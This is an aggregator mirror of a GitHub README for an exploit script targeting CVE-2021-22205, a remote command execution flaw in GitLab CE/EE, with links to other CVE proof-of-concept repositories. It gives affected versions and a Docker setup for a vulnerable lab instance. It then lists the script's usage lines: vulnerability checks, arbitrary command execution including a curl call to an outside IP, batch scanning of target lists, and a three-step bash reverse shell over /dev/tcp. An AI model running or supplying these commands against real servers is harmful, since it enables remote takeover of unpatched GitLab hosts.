GitHub - Al1ex/CVE-2021-22205: CVE-2021-22205& GitLab CE/EE RCE
source link: https://github.com/Al1ex/CVE-2021-22205
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Vuln Product
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
Environment
export GITLAB_HOME=/srv/gitlab sudo docker run --detach \ --hostname gitlab.example.com \ --publish 443:443 --publish 80:80 \ --name gitlab \ --restart always \ --volume $GITLAB_HOME/config:/etc/gitlab \ --volume $GITLAB_HOME/logs:/var/log/gitlab \ --volume $GITLAB_HOME/data:/var/opt/gitlab \ gitlab/gitlab-ce:13.9.1-ce.0
Vunl Check
Basic usage
python3 CVE-2021-2205.py
Vuln check
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
command execute
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"
batch scan
python3 CVE-2021-2205.py -s true -f target.txt
Reserve Shell
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
Reference
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
Recommend
-
44
cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid...
-
32
Files Permalink Latest commit message Commit time
-
14
Files Permalink Latest commit message Commit time
-
11
CVE-2021-1675 Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Tested on a fully patched...
-
54
From Lares Labs: Detection & Remediation Information for CVE-2021-1675 & CVE-2021-34527 This repo contains an EVTX sample of the CVE-2021-1675 attack as well as a minimal Sysmon configuration...
-
17
CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe4073...
-
8
CVE-2021-41773 Playground This is a small Docker recipe for setting up a Debian bookworm based container with an instance of the Apache HTTPd (2.4.49) that is vulnerable to
-
8
Files Permalink
-
11
README.md ...
-
3
KIE & Log4j2 exploit CVE-2021-44228by Mario Fusco - December 13, 2021
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK